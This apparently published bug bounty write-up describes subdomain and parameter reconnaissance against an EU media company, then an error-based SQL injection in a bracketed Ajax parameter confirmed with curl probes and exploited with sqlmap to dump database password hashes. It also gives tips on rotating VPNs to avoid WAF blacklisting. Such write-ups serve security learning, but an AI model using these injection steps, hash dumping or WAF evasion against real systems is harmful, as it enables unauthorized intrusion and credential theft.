Exploiting SQL Error SQLSTATE[42000] To Own MariaDB of A Large Online Media Leader

nav1n · Published in InfoSec Write-ups · May 20, 2023

I recently received a private invitation to hack into an EU-based Online Media and Entertainment organization. The target’s scope wasn’t extensive, but it did include a wildcard scope on a main website specific to an EU country, as well as a few web-apps and proprietary tools.

As I always say and do, I choose targets with the largest possible scope. This particular target wasn't significant enough to capture my interest on its own, but the bounty table caught my attention, particularly the high and critical bounties of $5,000 and $10,000 respectively, so I decided to accept the invitation.

SQL Injection in MariaDB

Recon Process:

As you may already know, my process and methodology for reconnaissance are quite straightforward. I begin by performing subdomain enumeration using various certificate transparency search tools such as crt.sh, Facebook’s certificate transparency monitoring tool, Netlas.io, and others.

When using crt.sh and Facebook’s CT monitoring tool, the process is relatively simple. However, with Netlas, I employ the following queries to obtain as many endpoints as possible:

https://app.netlas.io/certs/?q=certificate.subject.organizational_unit:"Org Name"&page=1&indices=

And using some regex:

domain:/(.*\.)?domain\.[a-z0-9-]*/

While the regex above can yield a large amount of data depending on the target, its usefulness is limited to cases where the target scope is focused on country-code top-level domains (ccTLDs) or other common top-level domains like .info, .net, .io, .com, and so on.

After gathering a list of subdomains, the next step is to filter out duplicates. Once that was done, I processed the list with SubFinder using the following script:

subfinder --all -dL sub.list | httpx -o ~/final-sublist-httpx.txt

The command above takes the list of subdomains and uses SubFinder to perform passive subdomain enumeration. The results are then piped into HTTPX for HTTP probing and saved as "final-sublist-httpx.txt".
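For completeness, the de-duplication step before that pipeline is nothing fancy. Assuming the raw certificate-transparency output is collected in a file such as raw-subs.txt (a hypothetical name), it can be as simple as:

# raw-subs.txt is a placeholder for the combined crt.sh/Facebook CT/Netlas output;
# lowercase and de-duplicate it before feeding it to SubFinder.
tr 'A-Z' 'a-z' < raw-subs.txt | sort -u > sub.list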

From the final list obtained, now I can initiate a bulk ParamSpider scan using the following command:

cat ~/final-sublist-httpx.txt | xargs -I % python3 ~/ParamSpider/paramspider.py -l high -o ./out/% -d % ;
ParamSpider Bulk URL Scanning

After completing the parameter scraping process, I moved on to manually inspecting the discovered URLs. This manual inspection is essential for identifying long URLs that contain multiple parameters; I always look for longer URLs because they let me inject payloads into several parameters within the same URL.
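One quick way to surface the parameter-heavy URLs first is to rank them by the number of parameters they carry. The snippet below is a rough sketch assuming the ParamSpider results sit under ./out/ as in the command above:

# Rank scraped URLs by parameter count (most '&'-separated fields first).
cat ./out/* | awk -F'&' '{ print NF, $0 }' | sort -rn | head -n 50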

While examining the URLs, I decided to focus on PHP endpoints, as I'm confident in my ability to discover vulnerabilities such as XSS, SQLi, or SSRF in PHP-based web apps.

To streamline my approach, I sorted the URLs by their .php extensions, which resulted in a new file containing over 300 URLs with PHP endpoints.
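The filtering itself is a one-liner. Assuming the same ./out/ directory, it looked roughly like this:

# Keep only URLs pointing at .php endpoints, de-duplicated into a new working file.
cat ./out/* | grep -iE '\.php(\?|/|$)' | sort -u > php-endpoints.txt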

EyeWitness Everything

In my experience, visual inspection of the targets is often the best approach during reconnaissance. By personally examining the targets, one can determine whether further analysis is necessary. Certain pages, such as blank pages, login screens, 403 pages, IIS default pages, RDP logins, or PHPInfo pages, can be vulnerable themselves or disclose sensitive information, so it is important to consider them during an assessment.

To inspect the URLs efficiently, I had two options: open and analyze each URL individually, or use an automated screenshot tool like EyeWitness. I opted for EyeWitness. After running it against the URLs and collecting the screenshots, I opened the generated report and began analyzing the pages one by one.
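For reference, the EyeWitness run was along these lines; the input and report names are placeholders rather than the exact command I used:

# Screenshot every PHP endpoint and write the HTML report to ./ew-report/.
./EyeWitness.py -f php-endpoints.txt --web -d ew-report --timeout 10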

Initially, nothing stood out until I encountered the endpoint with ajax.php, which displayed an output as shown in the below screenshot. Recognizing its potential significance, I copied the link and submitted it through WaybackURLs for further investigation.

└─# waybackurls -dates https://sub.domain.com/foo/bar/ajax.php

Upon retrieving approximately 25–30 lines of archived data from WaybackURLs, I proceeded to examine the URLs. It became apparent that these URLs represented past queries that had been made on the target website. Recognizing their potential relevance, I copied them into Burp Suite and sent them to the Repeater tab for further analysis and testing.

After sending the request through Burp Suite's Repeater tab, I received a different response than expected, as depicted in the screenshot. I knew this discrepancy was genuine because my request had been intercepted from the browser, so it included the appropriate cookie and PHP session ID.

The differing response suggests that the server might be employing some form of dynamic behavior or session-based logic, resulting in varying outcomes based on the presence or absence of specific cookies or session IDs. This discovery highlights the potential for further investigation and exploitation of the website’s functionality.

SQLSTATE[42000]: Syntax Error:

The URL I was examining contained approximately 15 parameters, and I began experimenting with each of them by sending them to Burp Collaborator with SQLi payloads. However, regardless of the payload I used, the response remained consistent. This indicated that the server was likely properly handling the majority of the parameters.

Nevertheless, I persisted in testing all the parameters until I came across "&***sales_ref=[123]", which appeared to be some kind of sales reference. Despite being unsure of its exact purpose, I sent the payload "&***sales_ref=['"123]" and, to my surprise, encountered an "SQL error SQLSTATE[42000]: Syntax Error:…" in the response.

This finding suggested a potential SQL injection vulnerability in the sales_ref parameter.
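To illustrate the kind of probe that surfaced it, here is a hypothetical reproduction using the placeholder host from earlier and the redacted parameter name; the session cookie value is a placeholder as well:

# -g disables curl's bracket globbing so the literal [123] value is sent as-is.
# Baseline request: returns the normal JSON response.
curl -sg -b 'PHPSESSID=<session>' 'https://sub.domain.com/foo/bar/ajax.php?xxxsales_ref=[123]'

# The same request with an unbalanced quote inside the value returns the
# SQLSTATE[42000] syntax error instead, the classic error-based SQLi tell.
curl -sg -b 'PHPSESSID=<session>' "https://sub.domain.com/foo/bar/ajax.php?xxxsales_ref=['\"123]"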

At that moment, with the discovery of the SQL error and the realization that there was a potential vulnerability in the database or web application, I felt a sense of victory. I paused my ongoing activities, including the scanning in Burp Suite and other tools like Dalfox.

Taking a moment to appreciate the progress made, I took a deep breath and treated myself to a cup of coffee before returning to my desk.

The SQL error message, “SQLSTATE[42000]: Syntax error or access violation…,” indicated that there was indeed a vulnerability present within the database or web application. This was the very outcome I had been searching for during my reconnaissance process.

The Error Message:

{"success":***,"**":**,"****":"SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''\") ******"}

I switched on my VPN, copied the URL from Burp Repeater, and visited the page in my browser to confirm that the SQL error was still present. This confirmed that the error persisted, providing additional validation for the vulnerability I had identified earlier and verifying it was ready for further investigation.

Note: Switching between different VPN locations helps mitigate the risk of the Web Application Firewall (WAF) blacklisting your IP address. Testing a few SQLi payloads at regular intervals may not raise suspicion, but conducting bulk testing or running automated scripts can trigger security measures. By consistently rotating the VPN, I ensure I can continue my testing and investigation without hindrance or unwanted attention from Mr. WAF.

SQLMap

As I knew the database was vulnerable to error-based SQL injection, I copied the request file and fired up SQLMap. In the first run, without specifying any parameters, it failed to detect any SQL injection. I then ran it again, this time with the `-p xxxsales_ref` option, but SQLMap still couldn't detect any SQL injection vulnerabilities.
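Roughly, those first attempts looked like the following; the request file name is a placeholder, and the parameter is the redacted one from above:

# First run: request file straight from Burp, no parameter hints.
sqlmap -r ajax-request.txt --batch --random-agent

# Second run: explicitly targeting the suspicious parameter with higher detection depth.
sqlmap -r ajax-request.txt --batch --random-agent -p "xxxsales_ref" --level=5 --risk=3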

This was an incredibly frustrating situation. I was at a loss as to why SQLMap was failing despite my attempts: I had tried multiple tamper scripts and adjusted the delay and detection level, yet SQLMap wasn't detecting anything substantial, even though it recognized the possibility of injection.

I considered using Ghauri as an alternative testing tool, but unfortunately it does not handle Ajax parameters well, and those were vital in this context.

SQLMap — but manual mode

Since the automated SQLMap runs had failed, I decided to take a more manual approach and run SQLMap directly against the URL. I copied the GET request and executed SQLMap without the `--batch` flag, which enables interactive mode and provides more control and flexibility during the scan.

While working with Ajax/JSON-based parameters, I realized that SQLMap, by default, does not inject payloads within those value boundaries. When the `--batch` flag is used, SQLMap automatically skips these parameters, so no injection is detected. This explained why SQLMap had been unable to find any injections in my previous attempts.

In the third round of testing, I used SQLMap in manual mode by providing the URL directly. This time, when prompted by SQLMap, I actively selected “yes” to indicate my intention to inject payloads within the parameter boundaries, as demonstrated in the accompanying screenshot. By doing so, I ensured that SQLMap would thoroughly test and explore potential injection points within the specified parameters.
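Sketched with the placeholder URL from earlier, the third run simply drops --batch so SQLMap's interactive prompts come through:

# No --batch: SQLMap stops and asks before skipping anything. When it notices the
# [123]-style value and asks whether to inject inside its boundaries, answer 'y'
# so the payloads land within the brackets.
sqlmap -u 'https://sub.domain.com/foo/bar/ajax.php?xxxsales_ref=[123]' --random-agent --level=5 --risk=3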

Within a few minutes of running SQLMap with the specified configuration, the tool successfully detected four types of SQL injections: boolean-based blind, error-based, stacked queries, and time-based blind. This discovery highlights the vulnerability of the target database to various injection techniques.

Additionally, SQLMap identified another parameter that I had previously tested manually and confirmed it was vulnerable as well. These findings provided valuable insight into the potential attack surface and emphasized the importance of thorough vulnerability testing.

To increase the severity, I proceeded to dump the password hashes from the compromised database. This gave me sensitive information that could potentially be used to gain unauthorized access to user and administrator accounts.
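For the curious, escalating from a confirmed injection to hash dumping with SQLMap usually comes down to flags along these lines (illustrative, not necessarily my exact command):

# Enumerate the DBMS accounts and dump their password hashes.
sqlmap -u 'https://sub.domain.com/foo/bar/ajax.php?xxxsales_ref=[123]' --random-agent --users --passwords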

The following day, my report underwent triaging, and within the following week, I received a bounty of $3,000.

Since the bounty was not what I expected, I inquired about the reasoning behind it. In response, the triager explained that the subdomain I exploited had less impact on the organization, as it did not contain personally identifiable information (PII) or critical business data. Instead, it primarily contained sales leads generated from page clicks, which were used for analysis by the sales team.

Although I couldn't independently verify this information, I accepted the explanation and the $3,000 bounty with contentment and appreciation.

That’s all for now, thank you for reading.

NS

Follow me on twitter: https://twitter.com/nav1n0x
